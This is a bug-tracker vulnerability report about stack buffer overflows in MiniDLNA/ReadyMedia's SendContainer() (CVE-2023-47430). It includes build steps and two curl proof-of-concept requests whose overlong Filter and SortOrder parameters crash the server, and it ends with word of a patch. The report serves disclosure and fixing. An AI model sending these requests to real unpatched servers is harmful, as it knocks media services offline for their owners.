#361 stack-buffer-overflows in SendContainer() at tivo_commands.c

[veltavid]

In MiniDLNA/ReadyMedia v1.3.3, there exists stack-buffer-overflow vulnerabilities due to a lack of proper boundary checks when invoking strcat() on certain variables (i.e., order,order2 and myfilter), in SendContainer(), tivo_commands.c. This allows an attacker to cause a Denial of Service (DoS).

Test Environment

Ubuntu 20.04, 64 bit MiniDLNA/ReadyMedia (master; commit 1a9b32)

How to trigger

• Compile the program with commands below

./configure --enable-tivo CFLAGS="-g -O0 -fstack-protector"
make minidlnad

• set enable_tivo to yes and run the program

sed -i "s/enable_tivo=no/enable_tivo=yes/g" minidlna.conf
sudo ./minidlnad -R -f ./minidlna.conf -d

• run a command like

curl "http://127.0.0.1:8200/TiVoConnect?Command=QueryContainer&Container=aaaa&Filter=video,video,video,video,video,video,video,video,video,video,video,video,video,video,video,video,video,video,video"

or

curl "http://127.0.0.1:8200/TiVoConnect?Command=QueryContainer&Container=aaaa&SortOrder=Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type,Type"

[Dominik Mierzejewski]

FYI, this was assigned CVE-2023-47430 .

[Dominik Mierzejewski]

Attaching a quick and dirty patch to fix. It doesn't crash with the two sample reproducers above anymore.